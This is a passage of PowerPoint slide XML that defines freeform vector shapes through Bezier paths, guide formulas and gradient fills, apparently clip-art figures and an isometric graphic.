                    <a:gd name="T7" fmla="*/ 23 h 140"/>
                    <a:gd name="T8" fmla="*/ 108 w 108"/>
                    <a:gd name="T9" fmla="*/ 22 h 140"/>
                    <a:gd name="T10" fmla="*/ 108 w 108"/>
                    <a:gd name="T11" fmla="*/ 17 h 140"/>
                    <a:gd name="T12" fmla="*/ 108 w 108"/>
                    <a:gd name="T13" fmla="*/ 16 h 140"/>
                    <a:gd name="T14" fmla="*/ 108 w 108"/>
                    <a:gd name="T15" fmla="*/ 16 h 140"/>
                    <a:gd name="T16" fmla="*/ 89 w 108"/>
                    <a:gd name="T17" fmla="*/ 7 h 140"/>
                    <a:gd name="T18" fmla="*/ 64 w 108"/>
                    <a:gd name="T19" fmla="*/ 2 h 140"/>
                    <a:gd name="T20" fmla="*/ 57 w 108"/>
                    <a:gd name="T21" fmla="*/ 4 h 140"/>
                    <a:gd name="T22" fmla="*/ 49 w 108"/>
                    <a:gd name="T23" fmla="*/ 6 h 140"/>
                    <a:gd name="T24" fmla="*/ 49 w 108"/>
                    <a:gd name="T25" fmla="*/ 6 h 140"/>
                    <a:gd name="T26" fmla="*/ 0 w 108"/>
                    <a:gd name="T27" fmla="*/ 18 h 140"/>
                    <a:gd name="T28" fmla="*/ 29 w 108"/>
                    <a:gd name="T29" fmla="*/ 47 h 140"/>
                    <a:gd name="T30" fmla="*/ 62 w 108"/>
                    <a:gd name="T31" fmla="*/ 40 h 140"/>
                    <a:gd name="T32" fmla="*/ 62 w 108"/>
                    <a:gd name="T33" fmla="*/ 118 h 140"/>
                    <a:gd name="T34" fmla="*/ 101 w 108"/>
                    <a:gd name="T35" fmla="*/ 129 h 140"/>
                    <a:gd name="T36" fmla="*/ 108 w 108"/>
                    <a:gd name="T37" fmla="*/ 117 h 140"/>
                    <a:gd name="T38" fmla="*/ 108 w 108"/>
                    <a:gd name="T39" fmla="*/ 36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08" h="140">
                      <a:moveTo>
                        <a:pt x="108" y="36"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="33"/>
                        <a:pt x="108" y="30"/>
                        <a:pt x="108" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="28"/>
                        <a:pt x="108" y="26"/>
                        <a:pt x="108" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="23"/>
                        <a:pt x="108" y="22"/>
                        <a:pt x="108" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="21"/>
                        <a:pt x="108" y="19"/>
                        <a:pt x="108" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="4"/>
                        <a:pt x="95" y="8"/>
                        <a:pt x="89" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="6"/>
                        <a:pt x="73" y="0"/>
                        <a:pt x="64" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="3"/>
                        <a:pt x="57" y="4"/>
                        <a:pt x="57" y="4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29" y="47"/>
                        <a:pt x="29" y="47"/>
                        <a:pt x="29" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="67"/>
                        <a:pt x="62" y="109"/>
                        <a:pt x="62" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="138"/>
                        <a:pt x="89" y="140"/>
                        <a:pt x="101" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="126"/>
                        <a:pt x="108" y="122"/>
                        <a:pt x="108" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="101"/>
                        <a:pt x="107" y="69"/>
                        <a:pt x="108" y="3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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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23" name="Freeform 597"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2418" y="1435"/>
                  <a:ext cx="267" cy="226"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 197"/>
                    <a:gd name="T1" fmla="*/ 44 h 167"/>
                    <a:gd name="T2" fmla="*/ 196 w 197"/>
                    <a:gd name="T3" fmla="*/ 37 h 167"/>
                    <a:gd name="T4" fmla="*/ 177 w 197"/>
                    <a:gd name="T5" fmla="*/ 18 h 167"/>
                    <a:gd name="T6" fmla="*/ 137 w 197"/>
                    <a:gd name="T7" fmla="*/ 25 h 167"/>
                    <a:gd name="T8" fmla="*/ 99 w 197"/>
                    <a:gd name="T9" fmla="*/ 35 h 167"/>
                    <a:gd name="T10" fmla="*/ 99 w 197"/>
                    <a:gd name="T11" fmla="*/ 52 h 167"/>
                    <a:gd name="T12" fmla="*/ 99 w 197"/>
                    <a:gd name="T13" fmla="*/ 35 h 167"/>
                    <a:gd name="T14" fmla="*/ 99 w 197"/>
                    <a:gd name="T15" fmla="*/ 35 h 167"/>
                    <a:gd name="T16" fmla="*/ 99 w 197"/>
                    <a:gd name="T17" fmla="*/ 2 h 167"/>
                    <a:gd name="T18" fmla="*/ 89 w 197"/>
                    <a:gd name="T19" fmla="*/ 14 h 167"/>
                    <a:gd name="T20" fmla="*/ 2 w 197"/>
                    <a:gd name="T21" fmla="*/ 8 h 167"/>
                    <a:gd name="T22" fmla="*/ 2 w 197"/>
                    <a:gd name="T23" fmla="*/ 10 h 167"/>
                    <a:gd name="T24" fmla="*/ 2 w 197"/>
                    <a:gd name="T25" fmla="*/ 31 h 167"/>
                    <a:gd name="T26" fmla="*/ 12 w 197"/>
                    <a:gd name="T27" fmla="*/ 67 h 167"/>
                    <a:gd name="T28" fmla="*/ 70 w 197"/>
                    <a:gd name="T29" fmla="*/ 83 h 167"/>
                    <a:gd name="T30" fmla="*/ 83 w 197"/>
                    <a:gd name="T31" fmla="*/ 82 h 167"/>
                    <a:gd name="T32" fmla="*/ 149 w 197"/>
                    <a:gd name="T33" fmla="*/ 65 h 167"/>
                    <a:gd name="T34" fmla="*/ 150 w 197"/>
                    <a:gd name="T35" fmla="*/ 137 h 167"/>
                    <a:gd name="T36" fmla="*/ 150 w 197"/>
                    <a:gd name="T37" fmla="*/ 141 h 167"/>
                    <a:gd name="T38" fmla="*/ 197 w 197"/>
                    <a:gd name="T39" fmla="*/ 140 h 167"/>
                    <a:gd name="T40" fmla="*/ 196 w 197"/>
                    <a:gd name="T41" fmla="*/ 4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7" h="167">
                      <a:moveTo>
                        <a:pt x="196" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="44"/>
                        <a:pt x="196" y="40"/>
                        <a:pt x="196" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="23"/>
                        <a:pt x="183" y="19"/>
                        <a:pt x="177" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="168" y="17"/>
                        <a:pt x="137" y="25"/>
                        <a:pt x="137" y="2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20"/>
                        <a:pt x="99" y="4"/>
                        <a:pt x="99" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="8"/>
                        <a:pt x="95" y="13"/>
                        <a:pt x="89" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="16"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="55"/>
                        <a:pt x="0" y="64"/>
                        <a:pt x="12" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="69"/>
                        <a:pt x="66" y="82"/>
                        <a:pt x="70" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="83"/>
                        <a:pt x="78" y="84"/>
                        <a:pt x="83" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="78"/>
                        <a:pt x="127" y="71"/>
                        <a:pt x="149" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="138"/>
                        <a:pt x="150" y="140"/>
                        <a:pt x="150" y="141"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="167"/>
                        <a:pt x="196" y="163"/>
                        <a:pt x="197" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="125"/>
                        <a:pt x="196" y="60"/>
                        <a:pt x="196" y="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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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24" name="Freeform 598"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2363" y="1229"/>
                  <a:ext cx="343" cy="269"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 209 w 254"/>
                    <a:gd name="T1" fmla="*/ 119 h 200"/>
                    <a:gd name="T2" fmla="*/ 184 w 254"/>
                    <a:gd name="T3" fmla="*/ 127 h 200"/>
                    <a:gd name="T4" fmla="*/ 173 w 254"/>
                    <a:gd name="T5" fmla="*/ 55 h 200"/>
                    <a:gd name="T6" fmla="*/ 144 w 254"/>
                    <a:gd name="T7" fmla="*/ 27 h 200"/>
                    <a:gd name="T8" fmla="*/ 96 w 254"/>
                    <a:gd name="T9" fmla="*/ 14 h 200"/>
                    <a:gd name="T10" fmla="*/ 51 w 254"/>
                    <a:gd name="T11" fmla="*/ 2 h 200"/>
                    <a:gd name="T12" fmla="*/ 18 w 254"/>
                    <a:gd name="T13" fmla="*/ 13 h 200"/>
                    <a:gd name="T14" fmla="*/ 3 w 254"/>
                    <a:gd name="T15" fmla="*/ 96 h 200"/>
                    <a:gd name="T16" fmla="*/ 3 w 254"/>
                    <a:gd name="T17" fmla="*/ 96 h 200"/>
                    <a:gd name="T18" fmla="*/ 2 w 254"/>
                    <a:gd name="T19" fmla="*/ 99 h 200"/>
                    <a:gd name="T20" fmla="*/ 2 w 254"/>
                    <a:gd name="T21" fmla="*/ 99 h 200"/>
                    <a:gd name="T22" fmla="*/ 9 w 254"/>
                    <a:gd name="T23" fmla="*/ 118 h 200"/>
                    <a:gd name="T24" fmla="*/ 26 w 254"/>
                    <a:gd name="T25" fmla="*/ 119 h 200"/>
                    <a:gd name="T26" fmla="*/ 33 w 254"/>
                    <a:gd name="T27" fmla="*/ 117 h 200"/>
                    <a:gd name="T28" fmla="*/ 33 w 254"/>
                    <a:gd name="T29" fmla="*/ 117 h 200"/>
                    <a:gd name="T30" fmla="*/ 36 w 254"/>
                    <a:gd name="T31" fmla="*/ 116 h 200"/>
                    <a:gd name="T32" fmla="*/ 43 w 254"/>
                    <a:gd name="T33" fmla="*/ 114 h 200"/>
                    <a:gd name="T34" fmla="*/ 44 w 254"/>
                    <a:gd name="T35" fmla="*/ 76 h 200"/>
                    <a:gd name="T36" fmla="*/ 41 w 254"/>
                    <a:gd name="T37" fmla="*/ 77 h 200"/>
                    <a:gd name="T38" fmla="*/ 44 w 254"/>
                    <a:gd name="T39" fmla="*/ 53 h 200"/>
                    <a:gd name="T40" fmla="*/ 43 w 254"/>
                    <a:gd name="T41" fmla="*/ 171 h 200"/>
                    <a:gd name="T42" fmla="*/ 53 w 254"/>
                    <a:gd name="T43" fmla="*/ 183 h 200"/>
                    <a:gd name="T44" fmla="*/ 111 w 254"/>
                    <a:gd name="T45" fmla="*/ 199 h 200"/>
                    <a:gd name="T46" fmla="*/ 140 w 254"/>
                    <a:gd name="T47" fmla="*/ 177 h 200"/>
                    <a:gd name="T48" fmla="*/ 140 w 254"/>
                    <a:gd name="T49" fmla="*/ 171 h 200"/>
                    <a:gd name="T50" fmla="*/ 140 w 254"/>
                    <a:gd name="T51" fmla="*/ 139 h 200"/>
                    <a:gd name="T52" fmla="*/ 139 w 254"/>
                    <a:gd name="T53" fmla="*/ 98 h 200"/>
                    <a:gd name="T54" fmla="*/ 137 w 254"/>
                    <a:gd name="T55" fmla="*/ 84 h 200"/>
                    <a:gd name="T56" fmla="*/ 136 w 254"/>
                    <a:gd name="T57" fmla="*/ 79 h 200"/>
                    <a:gd name="T58" fmla="*/ 137 w 254"/>
                    <a:gd name="T59" fmla="*/ 84 h 200"/>
                    <a:gd name="T60" fmla="*/ 139 w 254"/>
                    <a:gd name="T61" fmla="*/ 98 h 200"/>
                    <a:gd name="T62" fmla="*/ 145 w 254"/>
                    <a:gd name="T63" fmla="*/ 136 h 200"/>
                    <a:gd name="T64" fmla="*/ 145 w 254"/>
                    <a:gd name="T65" fmla="*/ 137 h 200"/>
                    <a:gd name="T66" fmla="*/ 145 w 254"/>
                    <a:gd name="T67" fmla="*/ 137 h 200"/>
                    <a:gd name="T68" fmla="*/ 145 w 254"/>
                    <a:gd name="T69" fmla="*/ 142 h 200"/>
                    <a:gd name="T70" fmla="*/ 155 w 254"/>
                    <a:gd name="T71" fmla="*/ 165 h 200"/>
                    <a:gd name="T72" fmla="*/ 170 w 254"/>
                    <a:gd name="T73" fmla="*/ 171 h 200"/>
                    <a:gd name="T74" fmla="*/ 223 w 254"/>
                    <a:gd name="T75" fmla="*/ 155 h 200"/>
                    <a:gd name="T76" fmla="*/ 209 w 254"/>
                    <a:gd name="T77" fmla="*/ 119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54" h="200">
                      <a:moveTo>
                        <a:pt x="209" y="119"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="121"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="184" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="94"/>
                        <a:pt x="175" y="64"/>
                        <a:pt x="173" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="36"/>
                        <a:pt x="153" y="30"/>
                        <a:pt x="144" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="23"/>
                        <a:pt x="110" y="18"/>
                        <a:pt x="96" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="10"/>
                        <a:pt x="61" y="4"/>
                        <a:pt x="51" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="0"/>
                        <a:pt x="21" y="4"/>
                        <a:pt x="18" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="16"/>
                        <a:pt x="10" y="56"/>
                        <a:pt x="3" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96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0" y="109"/>
                        <a:pt x="4" y="116"/>
                        <a:pt x="9" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="121"/>
                        <a:pt x="20" y="120"/>
                        <a:pt x="26" y="119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4" y="117"/>
                        <a:pt x="35" y="117"/>
                        <a:pt x="36" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="116"/>
                        <a:pt x="41" y="115"/>
                        <a:pt x="43" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="76"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="41" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="60"/>
                        <a:pt x="44" y="49"/>
                        <a:pt x="44" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="59"/>
                        <a:pt x="43" y="123"/>
                        <a:pt x="43" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="177"/>
                        <a:pt x="47" y="182"/>
                        <a:pt x="53" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="186"/>
                        <a:pt x="102" y="197"/>
                        <a:pt x="111" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="200"/>
                        <a:pt x="138" y="190"/>
                        <a:pt x="140" y="177"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="175"/>
                        <a:pt x="140" y="173"/>
                        <a:pt x="140" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="124"/>
                        <a:pt x="140" y="111"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="92"/>
                        <a:pt x="137" y="87"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="82"/>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="82"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="93"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="108"/>
                        <a:pt x="142" y="120"/>
                        <a:pt x="145" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="136"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="154"/>
                        <a:pt x="151" y="161"/>
                        <a:pt x="155" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="169"/>
                        <a:pt x="164" y="170"/>
                        <a:pt x="170" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="186" y="167"/>
                        <a:pt x="204" y="161"/>
                        <a:pt x="223" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="254" y="147"/>
                        <a:pt x="236" y="110"/>
                        <a:pt x="209" y="119"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="2A79D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25" name="Freeform 599"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2440" y="1214"/>
                  <a:ext cx="89" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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6"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="47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Oval 600"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2429" y="1132"/>
                  <a:ext cx="119" cy="119"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFCC99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346" name="Freeform 5"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="4275692" y="2631482"/>
              <a:ext cx="5611190" cy="1509626"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 10238 w 37909"/>
                <a:gd name="T1" fmla="*/ 10200 h 10200"/>
                <a:gd name="T2" fmla="*/ 0 w 37909"/>
                <a:gd name="T3" fmla="*/ 7450 h 10200"/>
                <a:gd name="T4" fmla="*/ 27433 w 37909"/>
                <a:gd name="T5" fmla="*/ 71 h 10200"/>
                <a:gd name="T6" fmla="*/ 37909 w 37909"/>
                <a:gd name="T7" fmla="*/ 0 h 10200"/>
                <a:gd name="T8" fmla="*/ 37671 w 37909"/>
                <a:gd name="T9" fmla="*/ 2811 h 10200"/>
                <a:gd name="T10" fmla="*/ 10238 w 37909"/>
                <a:gd name="T11" fmla="*/ 10200 h 10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909" h="10200">
                  <a:moveTo>
                    <a:pt x="10238" y="10200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="7450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27433" y="71"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37909" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37671" y="2811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10238" y="10200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="DDDDDD">
                    <a:gamma/>
                    <a:tint val="68627"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="DDDDDD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47" name="Freeform 1184"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="8133876" y="2693168"/>
              <a:ext cx="1444576" cy="386939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48" name="Group 1461"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="8048638" y="2991504"/>
              <a:ext cx="464328" cy="139074"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="349" name="Freeform 1462"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="658" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446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0" name="Freeform 1463"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1656"/>
                <a:ext cx="3137" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T1" fmla="*/ 54 h 843"/>
                  <a:gd name="T2" fmla="*/ 898 w 3137"/>
                  <a:gd name="T3" fmla="*/ 0 h 843"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T5" fmla="*/ 120 h 843"/>
                  <a:gd name="T6" fmla="*/ 0 w 3137"/>
                  <a:gd name="T7" fmla="*/ 482 h 843"/>
                  <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T9" fmla="*/ 843 h 843"/>
                  <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                  <a:gd name="T11" fmla="*/ 482 h 843"/>
                  <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                  <a:gd name="T13" fmla="*/ 602 h 843"/>
                  <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T15" fmla="*/ 54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7" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54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1" name="Freeform 1464"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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2" name="Freeform 1465"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2448" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
